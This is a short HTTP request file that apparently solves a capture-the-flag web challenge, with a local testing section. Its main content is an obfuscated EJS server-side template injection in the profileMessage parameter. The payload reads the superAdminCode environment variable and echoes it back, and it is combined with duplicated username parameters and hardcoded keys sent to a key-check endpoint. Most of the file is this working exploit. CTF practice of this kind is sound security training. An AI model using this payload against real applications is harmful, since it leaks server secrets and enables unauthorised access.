###

GET https://chal38-4589uyh.vercel.app/profileName?username=robertf&username=robertf&key=784HDHASJJ3489JJFKSJ&profileMessage=<% const g = global["PROCESS".toLowerCase``]["ENV".toLowerCase``]["superAdminCode"]; %><%- name %><%- `  ${g}` %> HTTP/1.1

###

POST https://chal38-4589uyh.vercel.app/checkKeyValidity HTTP/1.1
Content-Type: application/json

{
  "username": "robertf",
  "key": "!!!6g44534i8j4589gj90kg5"
}

###

################################################ LOCAL TESTING ################################################

###

GET http://localhost:3000/profileName?username=robertf&profileMessage=Hello, <%= name %>! HTTP/1.1

###

GET http://localhost:3000/profileName?username=robertf&username=robertf&key=bar&profileMessage=<% const g = global["PROCESS".toLowerCase``]["ENV".toLowerCase``]["superAdminCode"]; %><%- name %><%- `  ${g}` %> HTTP/1.1

###